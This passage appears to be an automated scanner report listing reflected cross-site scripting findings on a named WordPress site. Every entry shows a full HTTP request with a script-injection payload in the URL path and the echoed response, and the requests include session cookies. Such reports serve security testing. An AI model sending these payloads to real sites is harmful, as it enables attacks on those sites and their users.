<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-admina5c5f<script>alert(1)</script>7b5a1b70079/css/login.css?ver=20100601 </strong>
...[SNIP]...

2.56. http://www.androidtapp.com/wp-admin/css/login.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-admin/css/login.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7f7a5<script>alert(1)</script>9b0dedc91ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin/css7f7a5<script>alert(1)</script>9b0dedc91ce/login.css?ver=20100601 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/wp-login.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:17:20 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:18 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-admin/css7f7a5<script>alert(1)</script>9b0dedc91ce/login.css?ver=20100601 </strong>
...[SNIP]...

2.57. http://www.androidtapp.com/wp-admin/css/login.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-admin/css/login.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b7ff7<script>alert(1)</script>8a49ffa7eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin/css/login.cssb7ff7<script>alert(1)</script>8a49ffa7eb?ver=20100601 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/wp-login.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:17:36 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-admin/css/login.cssb7ff7<script>alert(1)</script>8a49ffa7eb?ver=20100601 </strong>
...[SNIP]...

2.58. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/plugins/wp-polls/polls-css.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a584d<script>alert(1)</script>8a64675d152 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contenta584d<script>alert(1)</script>8a64675d152/plugins/wp-polls/polls-css.css?ver=2.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:37 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:15:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-contenta584d<script>alert(1)</script>8a64675d152/plugins/wp-polls/polls-css.css?ver=2.50 </strong>
...[SNIP]...

2.59. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/plugins/wp-polls/polls-css.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fc0a9<script>alert(1)</script>7d968794e31 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsfc0a9<script>alert(1)</script>7d968794e31/wp-polls/polls-css.css?ver=2.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:49 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:15:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/pluginsfc0a9<script>alert(1)</script>7d968794e31/wp-polls/polls-css.css?ver=2.50 </strong>
...[SNIP]...

2.60. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/plugins/wp-polls/polls-css.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d2e41<script>alert(1)</script>dc6b1b1a6cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-pollsd2e41<script>alert(1)</script>dc6b1b1a6cd/polls-css.css?ver=2.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:09 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:07 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/plugins/wp-pollsd2e41<script>alert(1)</script>dc6b1b1a6cd/polls-css.css?ver=2.50 </strong>
...[SNIP]...

2.61. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/plugins/wp-polls/polls-css.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a5199<script>alert(1)</script>a2929eae7fc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-polls/polls-css.cssa5199<script>alert(1)</script>a2929eae7fc?ver=2.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:28 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.cssa5199<script>alert(1)</script>a2929eae7fc?ver=2.50 </strong>
...[SNIP]...

2.62. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/plugins/wp-polls/polls-js.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9ee77<script>alert(1)</script>7cc8e94ec7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content9ee77<script>alert(1)</script>7cc8e94ec7d/plugins/wp-polls/polls-js.js?ver=2.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:44 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:15:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content9ee77<script>alert(1)</script>7cc8e94ec7d/plugins/wp-polls/polls-js.js?ver=2.50 </strong>
...[SNIP]...

2.63. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/plugins/wp-polls/polls-js.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1dbff<script>alert(1)</script>b6d08d9390f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins1dbff<script>alert(1)</script>b6d08d9390f/wp-polls/polls-js.js?ver=2.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:05 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:04 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/plugins1dbff<script>alert(1)</script>b6d08d9390f/wp-polls/polls-js.js?ver=2.50 </strong>
...[SNIP]...

2.64. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/plugins/wp-polls/polls-js.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 50078<script>alert(1)</script>a48f2ebca3f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-polls50078<script>alert(1)</script>a48f2ebca3f/polls-js.js?ver=2.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:35 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:28 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/plugins/wp-polls50078<script>alert(1)</script>a48f2ebca3f/polls-js.js?ver=2.50 </strong>
...[SNIP]...

2.65. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/plugins/wp-polls/polls-js.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 62b86<script>alert(1)</script>6e2a650f32b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-polls/polls-js.js62b86<script>alert(1)</script>6e2a650f32b?ver=2.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:17:12 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:04 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js62b86<script>alert(1)</script>6e2a650f32b?ver=2.50 </strong>
...[SNIP]...

2.66. http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/plugins/wp-postratings/postratings-js.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a20a8<script>alert(1)</script>bfb31b38a15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contenta20a8<script>alert(1)</script>bfb31b38a15/plugins/wp-postratings/postratings-js.js?ver=1.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:55 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:15:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-contenta20a8<script>alert(1)</script>bfb31b38a15/plugins/wp-postratings/postratings-js.js?ver=1.50 </strong>
...[SNIP]...

2.67. http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/plugins/wp-postratings/postratings-js.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f789e<script>alert(1)</script>f2acdbcfeda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsf789e<script>alert(1)</script>f2acdbcfeda/wp-postratings/postratings-js.js?ver=1.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:13 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/pluginsf789e<script>alert(1)</script>f2acdbcfeda/wp-postratings/postratings-js.js?ver=1.50 </strong>
...[SNIP]...

2.68. http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/plugins/wp-postratings/postratings-js.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9dfa9<script>alert(1)</script>8fc76e0ba66 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-postratings9dfa9<script>alert(1)</script>8fc76e0ba66/postratings-js.js?ver=1.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:46 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/plugins/wp-postratings9dfa9<script>alert(1)</script>8fc76e0ba66/postratings-js.js?ver=1.50 </strong>
...[SNIP]...

2.69. http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/plugins/wp-postratings/postratings-js.js

Issue detail

